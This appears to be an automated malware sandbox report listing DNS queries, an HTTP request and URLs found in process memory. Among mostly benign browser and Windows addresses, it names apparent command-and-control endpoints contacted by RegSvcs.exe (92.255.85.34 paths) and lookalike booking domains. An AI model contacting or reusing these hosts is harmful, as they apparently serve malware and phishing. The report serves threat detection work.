Source: global traffic	DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: dns-tunnel-check.googlezip.net
Source: global traffic	DNS traffic detected: DNS query: tunnel.googlezip.net
Source: global traffic	DNS traffic detected: DNS query: id.google.com
Source: global traffic	DNS traffic detected: DNS query: admin.booking.com
Source: global traffic	DNS traffic detected: DNS query: account.booking.com
Source: global traffic	DNS traffic detected: DNS query: cf.bstatic.com
Source: global traffic	DNS traffic detected: DNS query: cdn.cookielaw.org
Source: global traffic	DNS traffic detected: DNS query: www.bstatic.com
Source: global traffic	DNS traffic detected: DNS query: saa.booking.com
Source: global traffic	DNS traffic detected: DNS query: geolocation.onetrust.com
Source: global traffic	DNS traffic detected: DNS query: xx.bstatic.com
Source: global traffic	DNS traffic detected: DNS query: q-xx.bstatic.com
Source: global traffic	DNS traffic detected: DNS query: t-cf.bstatic.com
Source: global traffic	DNS traffic detected: DNS query: aa.online-metrix.net
Source: global traffic	DNS traffic detected: DNS query: d8c14d4960ca.edge.sdk.awswaf.com
Source: global traffic	DNS traffic detected: DNS query: asanalytics.booking.com
Source: global traffic	DNS traffic detected: DNS query: d8c14d4960ca.d2eb2267.us-east-1.token.awswaf.com
Source: global traffic	DNS traffic detected: DNS query: nellie.booking.com
Source: global traffic	DNS traffic detected: DNS query: booking.ck123.io
Source: global traffic	DNS traffic detected: DNS query: ls.cdn-gw-dv.vip
Source: global traffic	DNS traffic detected: DNS query: booking.gw-dv.vip
Source: global traffic	DNS traffic detected: DNS query: stun.12voip.com
Source: global traffic	DNS traffic detected: DNS query: stun.1und1.de
Source: global traffic	DNS traffic detected: DNS query: stun.aa.net.uk
Source: global traffic	DNS traffic detected: DNS query: stun.acrobits.cz
Source: global traffic	DNS traffic detected: DNS query: stun.actionvoip.com
Source: global traffic	DNS traffic detected: DNS query: stun.antisip.com
Source: global traffic	DNS traffic detected: DNS query: stun.bluesip.net
Source: global traffic	DNS traffic detected: DNS query: stun.cablenet-as.net
Source: global traffic	DNS traffic detected: DNS query: stun.callromania.ro
Source: global traffic	DNS traffic detected: DNS query: stun.l.google.com
Source: global traffic	DNS traffic detected: DNS query: stun.tel.lu
Source: global traffic	DNS traffic detected: DNS query: stun.telbo.com
Source: global traffic	DNS traffic detected: DNS query: stun.twt.it
Source: global traffic	DNS traffic detected: DNS query: stun.uls.co.za
Source: global traffic	DNS traffic detected: DNS query: stun.usfamily.net
Source: global traffic	DNS traffic detected: DNS query: stun1.l.google.com
Source: global traffic	DNS traffic detected: DNS query: stun2.l.google.com
Source: global traffic	DNS traffic detected: DNS query: stun3.l.google.com
Source: global traffic	DNS traffic detected: DNS query: stun4.l.google.com
Source: global traffic	DNS traffic detected: DNS query: h.online-metrix.net
Source: global traffic	DNS traffic detected: DNS query: eu-aa.online-metrix.net
Source: global traffic	DNS traffic detected: DNS query: h64.online-metrix.net
Source: global traffic	DNS traffic detected: DNS query: doregtzf6rn426qo26euthu32gkwujtuh4wpvuxu10e9fc93386172a1am1.e.aa.online-metrix.net

Source: unknown

HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 943sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: RegSvcs.exe, 00000003.00000002.3928894412.000000000112D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3928894412.0000000001188000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.155/1/34.png
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/55.85.34/-A2D8-08002B30309D
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3928894412.0000000001188000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.php
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.php$
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.php.0
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.php8
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.phpX
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.phpZ
Source: RegSvcs.exe, 00000003.00000002.3928894412.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.phpkd
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.phpv
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/i2Fe32Z13/index.phpz
Source: RegSvcs.exe, 00000003.00000002.3928894412.0000000001156000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.85.34/p
Source: powershell.exe, 00000008.00000002.2491868395.0000000007548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftN
Source: svchost.exe, 00000010.00000002.3950935889.0000023EBA600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: RegSvcs.exe, 0000000B.00000002.3928445625.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegSvcs.exe, 0000000B.00000002.3928445625.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en8
Source: firefox.exe, 00000022.00000003.3301958158.0000026F47DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000022.00000003.3300574092.0000026F47FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: svchost.exe, 00000010.00000003.2779868279.0000023EBA390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: firefox.exe, 00000022.00000003.3280742643.0000026F3D22D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000022.00000003.3297246505.000002720003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3234833555.0000026F3DB44000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3375741252.0000026F484BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3280986873.0000026F3BB0A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3387300979.0000026F3DBA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3343006107.0000026F3BB68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3167045877.0000026F3CEB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3159443093.0000026F3D0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3143832368.0000026F3D045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3271935177.0000026F3BB20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3141726240.0000026F3D040000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3160707950.0000026F3DB9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3232245148.0000026F3A7BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3366758674.0000026F3A4C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3275607482.0000026F46F74000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3306744981.0000026F484B9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3234833555.0000026F3DB19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3280986873.0000026F3BB15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3378348477.0000026F3D2E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3280986873.0000026F3BB1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3238443582.0000026F45499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: powershell.exe, 00000000.00000002.1505236184.000001F063666000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1531539658.000001F07218D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2467970634.0000000005D05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2467970634.0000000005B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2447416420.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440501639.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1505236184.000001F061921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2447416420.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3946822654.0000000002A83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 00000022.00000003.3140680222.0000026F3D087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: powershell.exe, 00000000.00000002.1505236184.000001F0632B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2447416420.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2440501639.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: firefox.exe, 00000022.00000003.3140680222.0000026F3D087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000008.00000002.2491868395.0000000007548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000000.00000002.1546556045.000001F079CEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co.
Source: firefox.exe, 00000022.00000003.3388065723.0000026F44D7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3315608639.0000026F44D7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000022.00000003.3231857283.0000026F3AB56000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3231857283.0000026F3AB5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3340592060.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3346767861.0000026F3AB70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3231857283.0000026F3AB70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3229982271.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3389506213.0000026F3A6D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000022.00000003.3147786713.0000026F3AFCB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3390874665.0000026F3AFCB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul%
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/mr2022-onboarding-set-default-primary-
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/This
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/chrome://activity-stream/content/d
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000022.00000003.3204241012.0000026F3D0F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/chrome://browser/content/assets/private
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000022.00000003.3220315626.0000026F47F85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: powershell.exe, 00000000.00000002.1505236184.000001F061921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2447416420.00000000049C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000022.00000003.3167045877.0000026F3CE80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000022.00000003.3133549240.0000026F3B01D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 00000022.00000003.3272291708.0000026F48412000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/ap
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 0000000F.00000002.3940177272.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2782585892.0000000006FF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000F.00000003.2779814531.0000000006FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRhO
Source: firefox.exe, 00000022.00000003.3159443093.0000026F3D0BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: powershell.exe, 00000008.00000002.2467970634.0000000005B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2467970634.0000000005B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2467970634.0000000005B53000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000022.00000003.3395419152.0000026F45B3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://datastudio.google.com/embed/reporting/
Source: firefox.exe, 00000022.00000003.3120545046.0000026F37B56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000022.00000003.3280986873.0000026F3BB15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 00000022.00000003.3388646094.0000026F45683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000022.00000003.3271480907.0000026F3BB67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000022.00000003.3300574092.0000026F47FFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: firefox.exe, 00000022.00000003.3333559112.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3239933873.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3381335714.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3305000079.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000003.3394215031.0000026F44D4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ebay.com
